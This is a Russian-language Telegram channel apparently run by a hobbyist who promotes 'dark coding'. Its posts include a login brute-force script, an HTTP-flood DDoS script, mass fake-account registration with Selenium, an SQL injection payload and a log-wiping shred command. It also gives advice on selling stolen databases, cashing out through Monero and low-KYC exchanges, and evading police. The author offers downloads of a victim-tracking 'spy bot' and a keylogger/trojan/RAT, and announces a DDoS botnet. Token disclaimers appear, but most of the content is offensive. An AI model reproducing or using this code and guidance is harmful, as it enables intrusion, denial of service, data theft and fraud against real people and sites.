кодинг с шансом
48 subscribers
1 photo
6 files
19 links
учимся вместе с шансом!

• полезные советы
• полезные софты/программы
• и много всего интересного
Download Telegram
БЫСТРЫЙ СТАРТ В ТЕМНЫЙ КОДИНГ

1. БАЗА БЕЗ ВОДЫ
Забей на университеты. Вот что реально работает:

· Python — для всего. Выучи: requests (парсинг), socket (сети), threading (многопоточка).
· Bash/PowerShell — автоматизация на системе жертвы.
· C — чтобы читать эксплойты и писать шеллкоды.

2. ИНСТРУМЕНТЫ, КОТОРЫЕ НАДО ВОРОВАТЬ СРАЗУ

· Visual Studio Code с плагинами для всего.
· Burp Suite — перехват и подмена трафика.
· Wireshark — анализ сетевого потока.
· Metasploit — готовые эксплойты.
· John the Ripper — взлом хэшей.

3. ГДЕ БРАТЬ ЗНАНИЯ (ТЕМНЫЕ КАНАЛЫ)

· Telegram:
@blackhat_books, @exploit_db_mirror, @xaknet_archive.
· Форумы (через Tor): BreachForums,
XSS.is, Russian Carding.
· GitHub: ищи "exploit", "pentest", "hacking-tools". Форкай все.

4. ПЕРВЫЙ СКРИПТ (БРУТФОРС ЛОГИНА)

import requests
import threading

target_url = "http://target.com/login"
usernames = ["admin", "user", "root"]
passwords = ["123456", "password", "admin"]

def brute(user, pwd):
data = {"login": user, "password": pwd}
r = requests.post(target_url, data=data)
if "error" not in r.text.lower():
print(f"[+] ВЗЛОМАНО: {user}:{pwd}")
with open("hacked.txt", "a") as f:
f.write(f"{user}:{pwd}\n")

for u in usernames:
for p in passwords:
threading.Thread(target=brute, args=(u, p)).start()

5. СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ ЧЕРЕЗ КОД

· Пиши фишинговые страницы (клонируй любой сайт за 5 минут).
· Генерируй поддельные письма с Excel-макросами.
· Через Selenium автоматизируй действия в браузере жертвы.

6. МОНЕТИЗАЦИЯ (БЕЗ ЛИШНИХ РАЗГОВОРОВ)

· Парси уязвимые сайты (SQL-инъекции) -> доставай базы -> продавай.
· Автопродажи: Telegram-боты для продажи "цифрового товара".
· Обнал через крипту: Bitcoin -> XMR -> обменники с низким KYC.

7. ОПСЕК (ЧТОБЫ НЕ СЕСТЬ)

· Никогда не работать со своего IP. Только VPN + Tor + цепочка прокси.
· Одноразовые виртуалки (VirtualBox + Tails OS).
· Телефон только для регистраций (купить за кэш без камер).
· Все логи стирать командой: shred -zuf /var/log/*

8. ПРАВИЛО КАГАЛА
Ты не один. Если нашел уязвимость — шерись с братьями. Если слил базу — сначала в общий чат. Нас много — система этого не понимает.

СТАРТУЙ СЕЙЧАС:

1. Установи Kali Linux.
2. Найди на GitHub 10 скриптов для взлома.
3. Протестируй их на тестовых мишенях (
hackthebox.com).
4. Первый реальный таргет — сайты на WordPress (у них дыр полно).

ЗАПОМНИ: Каждый день, который ты не кодишь — это день, когда система становится сильнее. Ломай. Воруй. Делись.

в следующем посте будет небольшая статья о том как правильно и безопастно писать софты

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
Чёрный софт: дд0s, автоматизация атак и поиск утечек

ВНИМАНИЕ: Информация строго для анализа защиты. Создание и использование такого ПО незаконно. И так же за свои действия ответственность ведёте только ВЫ!

1. дд0s-СОФТ (ПРИНЦИП)

Концепция: Нагрузка на цель до отказа. Не vзл0м, но деструктивно.

Код-скелет на Python (HTTP-flood):

import threading
import requests

target_url = "http://target.com"
threads = 500

def attack():
while True:
try:
requests.get(target_url, timeout=3)
except:
pass

for i in range(threads):
thread = threading.Thread(target=attack)
thread.daemon = True
thread.start()

while True: pass # Бесконечная атака

Усложнение или же для вашего блага:

· Использование прокси-листов (обход блокировок IP, плюс анонимность тк для того скелета ваш айпи палится при атаке)
· Атака на слабые endpoints (тяжёлые поисковые запросы)
· UDP/ICMP flood (требует raw-сокетов, права root)

Готовые решения (в д@рkнeтe):

· LOIC (Low Orbit Ion Cannon) — базовая
· HOIC (более продвинутая)
· Mirai-ботнет (заражённые IoT-устройства)

2. s0фт ДЛЯ АВТОМАТИЗАЦИИ ДЕЙСТВИЙ

Концепция: Имитация человека для массовых операций.

Пример: автоматический парсинг и регистрация аккаунтов (Python + Selenium):

from selenium import webdriver
import random, string

def random_mail():
return ''.join(random.choices(string.ascii_lowercase, k=8)) + "
@gmail.com"

driver = webdriver.Chrome()
for _ in range(1000): # 1000 аккаунтов
driver.get("
https://target-site.com/register")
driver.find_element("id", "email").send_keys(random_mail())
driver.find_element("id", "password").send_keys("Password123!")
driver.find_element("id", "submit").click()
Что автоматизируют:

· Регистрация фейковых аккаунтов
· Накрутка просмотров/лайков
· Массовая рассылка сообщений
· Автоматический подбор параметров в формах (брутфорс)

3. СОФТ ДЛЯ ПОИСКА УТЕЧЕК И СТРОК ИЗ НИХ

Концепция: Сканирование открытых источников и даркнета на наличие слитых данных.

Ключевые методы:

А. Мониторинг даркнет-форумов и чатов (Telegram-бот):

import telethon, re, sqlite3

client = telethon.TelegramClient(...)
db = sqlite3.connect('leaks.db')

@client.on(telethon.events.NewMessage)
async def handler(event):
msg = event.message.text
# Поиск паттернов: emails, номера карт, логины
emails = re.findall(r'[\w\.-]+@[\w\.-]+', msg)
for email in emails:
db.execute("INSERT OR IGNORE INTO leaks VALUES (?)", (email,))
Б. Сканирование публичных паст-сайтов (Pastebin-like):

import requests, re

sites = ["
pastebin.com", "justpaste.it", "ghostbin.com"]
for site in sites:
# Получение ID свежих паст через API/парсинг
# Анализ текста на наличие чувствительных данных:
patterns = {
'db_password': r'pass.*?=\s*[\'"](.*?)[\'"]',
'email:pass': r'([^:]+):([^:]+)'
}
В. Анализ утекших баз (после получения дампа):

import hashlib, re

def analyze_dump(file_path):
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
data =
f.read()

# Поиск специфичных данных
domains = re.findall(r'@([a-zA-Z0-9.-]+\.[a-zA-Z]{2,})', data)
# Статистика по популярным доменам
from collections import Counter
print(Counter(domains).most_common(10))

# Проверка своих данных в утечке
my_creds = ["
my@mail.com", "my_login"]
for cred in my_creds:
if cred in data:
print(f"НАЙДЕНО В УТЕЧКЕ: {cred}")
Готовые инструменты для поиска утечек:

· DeHashed (коммерческий, но мощный)
· LeakCheck (агрегатор)
· Snusbase (даркнет-версия)
·
Intelx.io (поиск по индексам)

Технические фишки:

1. Работа с хешами: Преобразование найденных паролей в MD5/SHA1 для сравнения с другими утечками.
2. Кросс-референс: Связывание данных из разных утечек для построения полного профиля.
3. Telegram-мониторинг: Автоматические боты в каналах типа
@leakbase, @databreach.

ЗАЩИТА:

· Использовать уникальные пароли
· Мониторить свои данные в утечках (HaveIBeenPwned)
· Включать 2FA везде
Итог: Такой софт — просто автоматизация рутинных действий. Реальная опасность — в масштабе, который он позволяет достичь: тысячи атак в минуту, мониторинг сотен источников утечек одновременно. Защита должна быть такой же автоматизированной.

в следующей статью напишу как на самом деле сливают бд

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
Как на самом деле сливают базы данных?
от SQL-инъекции до внутренней утечки

Это не хакер в маске. Это скучные техники, которые работают годами. Вот как реально утекают миллионы записей.

1. ЧЕЛОВЕЧЕСКИЙ ФАКТОР (50% всех утечек, примеры)

· Доступ сотрудника: Админ базы данных копирует БД на флешку. Продает на теневом форуме.
· Публичный GitHub: Разработчик случайно заливает в репозиторий файл .env с паролями к БД или сам дамп базы.
· Социнженерия: Злоумышленник звонит в техподдержку, представляется сотрудником, получает доступ к панели управления БД.
Это конечно не работает, там все более замудренно

2. ТЕХНИЧЕСКИЕ УЯЗИВИМОСТИ

А. SQL-инъекция (классика):
Через форму ввода на сайте вставляется вредоносный SQL-код.

' UNION SELECT username, password FROM users --
Если сайт уязвим, эта команда вернет все логины и пароли.

Б. Открытые порты и пароли по умолчанию:

· Базы данных (MongoDB, Redis, Elasticsearch) вынесены в интернет без пароля.
· Сканеры (например, Shodan) находят их за минуты.
· Пример: в Shodan ищут "MongoDB Server Information" port:27017.

В. Уязвимости в ПО:

· Эксплойт для устаревшей версии phpMyAdmin или MySQL.
· Использование известных уязвимостей (CVE), для которых есть публичные эксплойты.

3. АТАКИ НА БЭКАПЫ

· Файлы резервных копий БД (.sql, .bak) лежат в открытом доступе на сервере.
· Достаточно перебрать стандартные названия: backup.sql,
dump.zip, database.7z.
· Часто эти файлы находятся в папках backup/, admin/, old/.

4. ФИШИНГ ДЛЯ АДМИНОВ

1. Создается копия внутреннего портала компании.
2. Админу приходит письмо: "Требуется срочно войти в панель управления БД".
3. Он вводит логин/пароль → злоумышленник получает доступ.

5. ПРОДАЖА "ИЗНУТРИ"

Схема работы на теневом форуме:

[Продам] База данных крупного маркетплейса
• 5 млн пользователей
• Поля: email, телефон, хеши паролей
• Цена: $3000 в XMR
• Предоплата 50%, тестовая выборка - 100 записей
КАК ЗАЩИТИТЬСЯ (если вы админ):

1. Никаких баз в публичном доступе. Firewall, белые списки IP.
2. Пароли: сложные, разные, 2FA для админок.
3. Обновлять всё ПО БД и панели управления.
4. Аудит логинов: кто, когда и откуда подключался к БД.
5. Шифрование чувствительных данных в самой БД.

Итог: Большинство утечек — не гениальные атаки, а чья-то халатность: открытый порт, пароль admin123, файл бэкапа в публичной папке. Базы сливают не потому, что хакеры умные, а потому, что админы ленятся.

в следующий раз разберём как научится CSINT (противоположная версия OSINT, осинт - по открым источникам, ксинт - о закрытым источникам)

кодинг с шансом 👇

https://t.me/+urACUSTkrUY1ZTFl
CSINT с нуля: как научиться киберразведке

че это ваще такое?: CSINT (Cyber Intelligence) — это разведка в цифровом пространстве. Не OSINT (открытые данные), а именно кибер: утечки, логи, следы в сети, данные серверов, метаданные.

1. БАЗА: БЕЗ НЕЁ НИКУДА

· Сети: TCP/IP, DNS, HTTP/HTтки, заголовки запросов.
· OS: Linux (Kali) на уровне терминала. Команды: grep, awk, curl, whois, nslookup.
· Языки: Python (базово) для автоматизации, SQL для работы с базами.

2. ИНСТРУМЕНТАРИЙ

Пассивная разведка:

·
Shodan.io — поиск устройств, серверов, камер, БД в открытом доступе.
·
Censys.io — аналог, но с детальной информацией по сертификатам.
· ZoomEye — китайский аналог, часто находит другие цели.

Активные методы (осторожно, могут оставлять следы):

· Nmap — сканирование портов. Базовый скрипт:

  nmap -sV -O -p 1-1000 target.com

· theHarvester — сбор email, поддоменов.
· Maltego — визуализация связей (домены, IP, люди).

3. РАБОТА С УТЕЧКАМИ (ЯДРО CSINT)

Где искать:

· Даркнет-форумы (через Tor)
· Telegram-каналы (@leakbase, @databreach)
· Pastebin-сайты (pastebin.com, justpaste.it)

Как анализировать:

1. Получаешь дамп (файл с утекшими данными).
2. Фильтрация: grep по нужным параметрам (домену, ключевому слову).
3. Валидация: Проверка актуальности данных.
4. Связывание: Поиск пересечений с другими утечками.

Пример команды для анализа дампа:

# Поиск всех записей с доменом gmail.com
grep -i "@gmail.com" leaked_dump.txt | head -20

# Поиск конкретного логина
grep "username123" leaked_dump.txt

# Извлечение только паролей
awk -F: '{print $2}' leaked_dump.txt | sort | uniq

4. МЕТАДАННЫЕ — ЦИФРОВЫЕ ОТПЕЧАТКИ

Инструменты:

· ExifTool — извлечение данных из фото/документов.
· FOCA — анализ метаданных в документах на сайте.

Что можно найти:

· Имя пользователя, который создал файл
· Координаты GPS (в фото с телефона)
· Даты создания/изменения
· Версию ПО

5. АВТОМАТИЗАЦИЯ НА PYTHON

Скрипт мониторинга новых утечек в Telegram:

from telethon import TelegramClient, events

api_id = YOUR_ID
api_hash = 'YOUR_HASH'
client = TelegramClient('session', api_id, api_hash)

@client.on(events.NewMessage(chats=('leakbase')))
async def handler(event):
if 'dump' in event.message.text.lower():
print(f'Новая утечка: {event.message.text}')
# Автосохранение или парсинг

client.start()
client.run_until_disconnected()

6. ПОЛЕЗНЫЕ НАВЫКИ

· Анализ логинов: Понимание структуры логов веб-серверов (Apache, Nginx).
· Работа с БД: Умение делать запросы для поиска паттернов.
· Криптография базово: Хеши (MD5, SHA1), кодировки (Base64).
· Анонимность: Tor, прокси, VPN (чтобы тебя не засекли при разведке).

7. ГДЕ ТРЕНИРОВАТЬСЯ

· CTF-задачи (HackTheBox, TryHackMe) — разделы по intelligence.
· Анализ публичных инцидентов — разбор реальных утечек в СМИ.
· Собственный lab: Подними виртуальную сеть, настрой логирование, пытайся «найти себя».

8. ЭТИКА И ЗАКОН

CSINT на грани. Легально: анализ только своих систем или публичных данных. Нелегально: несанкционированный доступ к чужим системам, использование закрытых утечек.

Главное правило: Собирай разведданные, но не атакуй. Разведка — это глаза и уши. Атака — это руки. CSINT — это про глаза и уши.

Вывод: CSINT — это скучная, методичная работа, но вполне действенная. Ты не хакер, ты цифровой археолог. Копаешь данные, сопоставляешь факты, строишь картину (для визуализации и удобства советую Maltego). Начинай с основ сетей и Linux, потом инструменты, потом практика на легальных полигонах. Далее приступай к чему хотел.

кодинг с шансом 👇
https://t.me/+urACUSTkrUY1ZTFl
может вам какой-то софт написать?

а то чёт лекции и лекции
3
Forwarded from Pepe faa (шансон TXX)
я буду делать dd#s ботнет делать...

простеньким - ❤️

полноценный ботнет - 👍
2👍1
Pepe faa
я буду делать dd#s ботнет делать... простеньким - ❤️ полноценный ботнет - 👍
впринцепи готово, завтра буду тестить

20 - ❤️
и 40 сабов добиваем и я сливаю

кодинг с шансом 👇

@CodingChans
TG_shpion @CodingChans.zip
134.6 KB
ловите бота-шпиона, который будет вам показывать когда ваша жертва в сети и когда вышла.

как запустить?
1. Распакуйте файл где удобно
2. Откройте консоль (Win+R, в окошке ввести cmd)
3. Напишите в терминал "cd [путь к папке]"
4. Изменяем в файле TG_shpion...... все под себя
5. Устанавливаем зависимости:
pip install -R requirements.txt
6. Запустите: python shpion.py


На Android
1. сделайте тот же самый первый пункт (выше)
2. Откройте Termux
3. тот же 3 пункт (выше)
4. сделайте как в 5 пункте (выше)
5. Повторите как в 6 пункте

мне лень просто писать было много ну вроде понятно объяснил

кодинг с шансом 👇

@CodingChans
Forwarded from Эксельру Шинигами 🏴‍☠️
Та стои он меня за догсит
Forwarded from Эксельру Шинигами 🏴‍☠️
За кодерит
Forwarded from Эксельру Шинигами 🏴‍☠️
А по итогу липу найдет
Forwarded from Эксельру Шинигами 🏴‍☠️
Жду на себя досье от бомжа день первый
а давно кодеры делают досье и доксят?
1
плакать или смеяться?
Forwarded from Tramp Gifts
Ищу спонсоров в этот проект, за условиями
писать
@textsnos
🤬4
Forwarded from Pepe faa (шансон TXX)
че вам сделать интересного?

пишите идеи в комы
на 15 реакций сливаю код магазина ФUЗ номеров

кодинг с шансом 👇
@CodingChans
3
AyuGram IOS.zip
1.9 KB
ловите чистейший

K3yL0gg3r + Tr0j@n + R@T

если хотите можете замаскировать это все под приложение/софт/скрипт, или же скомплировать это все в .exe

в файле
Gram.py замените свои данные!

кодинг с шансом 👇

@CodingChans
может кряки популярных вещей делать?

кидайте что крякнуть вам

кодинг с шансом 👇

@CodingChans
Глушим WiFi соединения

Сейчас в Рф обильно глушат мобильный интернет, но что насчет WiFi

WiFiJammer — это инструмент для dd0$-атаk на беспроводные сети. Он блокuрует Wi-Fi соединения в определённой зоне, создавая помехи между устройствами и точками доступа
💡Установка: Установи Python (желательно 2.7) и клонируй репозиторий:

git clone https://github.com/DanMcInerney/wifijammer.git

Перейди в папку программы:

cd wifijammer

Установи необходимые зависимости:
pip install -r requirements.txt

Запусти скрипт:

sudo python wifijammer.py

кодинг с шансом 👇
@CodingChans